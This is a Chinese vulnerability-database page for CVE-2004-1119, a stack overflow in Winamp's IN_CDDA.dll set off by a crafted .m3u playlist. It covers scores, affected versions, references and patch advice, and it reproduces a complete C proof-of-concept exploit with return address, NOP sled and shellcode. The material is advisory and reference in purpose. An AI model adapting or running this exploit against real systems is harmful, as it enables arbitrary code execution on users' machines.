CVE-2004-1119
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:23
NMCOE    

[原文]Stack-based buffer overflow in IN_CDDA.dll in Winamp 5.05, and possibly other versions including 5.06, allows remote attackers to execute arbitrary code via a certain .m3u playlist file.


[CNNVD]Winamp in_cdda.dll 缓冲区溢出漏洞(CNNVD-200501-147)

        Winamp是一款流行的媒体播放程序。
        Winamp 5.05版本中IN_CDDA.dll存在堆栈溢出漏洞,5.06版本中可能也存在同样问题。
        远程攻击者可利用特殊构造的.m3u播放列表文件执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:winamp:5.04Nullsoft Winamp 5.04
cpe:/a:nullsoft:winamp:5.03Nullsoft Winamp 5.03
cpe:/a:nullsoft:winamp:5.06Nullsoft Winamp 5.06
cpe:/a:nullsoft:winamp:5.05Nullsoft Winamp 5.05
cpe:/a:nullsoft:winamp:5.02Nullsoft Winamp 5.02
cpe:/a:nullsoft:winamp:5.01Nullsoft Winamp 5.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1119
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1119
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-147
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-11/0369.html
(UNKNOWN)  BUGTRAQ  20041126 Re: Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched
http://marc.info/?l=bugtraq&m=110123330404482&w=2
(UNKNOWN)  BUGTRAQ  20041123 Winamp - Buffer Overflow In IN_CDDA.dll
http://marc.info/?l=bugtraq&m=110146036300803&w=2
(UNKNOWN)  BUGTRAQ  20041124 Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched]
http://marc.info/?l=ntbugtraq&m=110126352412395&w=2
(UNKNOWN)  NTBUGTRAQ  20041123 Winamp - Buffer Overflow In IN_CDDA.dll
http://marc.info/?l=ntbugtraq&m=110135574326217&w=2
(UNKNOWN)  NTBUGTRAQ  20041124 Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched]
http://www.kb.cert.org/vuls/id/986504
(UNKNOWN)  CERT-VN  VU#986504
http://www.security-assessment.com/Papers/Winamp_IN_CDDA_Buffer_Overflow.pdf
(UNKNOWN)  MISC  http://www.security-assessment.com/Papers/Winamp_IN_CDDA_Buffer_Overflow.pdf
http://www.securityfocus.com/bid/11730
(VENDOR_ADVISORY)  BID  11730
http://xforce.iss.net/xforce/xfdb/18197
(VENDOR_ADVISORY)  XF  winamp-incddadll-bo(18197)

- 漏洞信息

Winamp in_cdda.dll 缓冲区溢出漏洞
危急 缓冲区溢出
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        Winamp是一款流行的媒体播放程序。
        Winamp 5.05版本中IN_CDDA.dll存在堆栈溢出漏洞,5.06版本中可能也存在同样问题。
        远程攻击者可利用特殊构造的.m3u播放列表文件执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.winamp.com/media-player

- 漏洞信息 (654)

Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit (EDBID:654)
windows remote
2004-11-24 Verified
0 k-otik
[点击下载] [点击下载]
/* 

Credits go to the author

How to fix and study the bug:

* - The cdda library only reserves 20 bytes for names when files are "*.cda"
* - run Winamp with ollye
* - when loaded locate and break at:

10009BBB 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
10009BBF 84C0 TEST AL,AL
10009BC1 74 0F JE SHORT in_cdda.10009BD2
10009BC3 3C 2E CMP AL,2E
10009BC5 74 0B JE SHORT in_cdda.10009BD2

that code copies and overwrites the stack if no '.' is found in the 
first 20 bytes of the m3u entry. Entry must not have #EXTINF data or 
it won't resolve.

* - name that entry like "C:\\1234567890abXXXX.cda" and xxxx will be your return address. 
stack will be overwritten and exception occurs. When going out of that exception you'll be launched to padding.
* - look for .data section of in_cdda.dll and locate the shellcode or string, and update if needed the
field Location of shellcode (see host info). In my case it's x1002355b.
*/


#include <stdio.h> //File ops.

//m3u File format
//http://hanna.pyxidis.org/tech/m3u.html

// Host info:
// Name=ntdll (system)
// File version=5.1.2600.1217 (xpsp2.030429-213)
// Path=H:\WINDOWS\System32\ntdll.dll

// Name=in_cdda
// Base=10000000 
// Size=00031000 (200704.)
// Entry=1000CE1A in_cdda.<ModuleEntryPoint> 
// Path=H:\Archivos de programa\Winamp\Plugins\in_cdda.dll

#define HEADER "#EXTM3U\n"

//Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213 
//Address of MessageBoxA in xpsp2.030429-213: 77D3b064
char shellcode[]= 
"C:\\1234567890ab" //Padding
"\x5b\x35\x02\x10" //Location of shellcode : +-x10 bytes
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8"
"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111
"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68\x42\x6f"
"\x6f\x6d\x54\x5a\x50\x50\x52\x50\x53\x51\xc3.cda\n\r";

//Shellcode:
//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to
//2D 11111111 SUB EAX,11111111 ; Make characters readable
//50 PUSH EAX ; xchg registers : eax = 77D3b064
//59 POP ECX ; Offset to API.
//33C0 XOR EAX,EAX ; Create Null
//50 PUSH EAX ; Put ascii0 end of string
//68 61616161 PUSH 6d6f6f42 ; Create string.
//54 PUSH ESP ; Get the offset to the 
//5A POP EDX ; Message String
//MessageBox call
//50 PUSH EAX ; Null Pointer
//50 PUSH EAX ; Null Pointer
//52 PUSH EDX ; Message
//50 PUSH EAX ; Null Pointer
//53 PUSH EBX ; Return address: 0x00000000
//51 PUSH ECX ; Address of MessageBoxA
//C3 RETN ; Jump 


int main(int argc, char* argv[]) {
FILE *fp;
char *sc=(char *)malloc(sizeof(shellcode)+1);

printf ("winamp 5.x m3u parsing poc - advisorie by Brett Moore\n");
printf ("Exploit : www.k-otik.com/exploits/20041124.winampm3u.c\n");
printf ("Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213\n");
printf ("Address of MessageBoxA in xpsp2.030429-213: 77D3b064\n");
printf ("Tested on Winamp 5.02\n\n");

if (sc == NULL) {
printf ("malloc error\n");
return -1;
}

memset(sc,'\0',sizeof(sc));
memcpy(sc, shellcode, sizeof(shellcode) );

fp = fopen ("test.m3u","w+");
if (!fp) {
printf (" error opening file.\n");
return -1;
}

fwrite (HEADER, 1, strlen (HEADER), fp);
fwrite (sc , 1, strlen(sc) , fp);
fclose (fp);

printf ("file test.m3u created. Just double click it.\n");
return 0;

}

// milw0rm.com [2004-11-24]
		

- 漏洞信息

12093
Winamp IN_CDDA.dll m3u Playlist Processing Overflow
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2004-11-22 Unknow
2004-11-24 Unknow

- 解决方案

Upgrade to version 5.0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站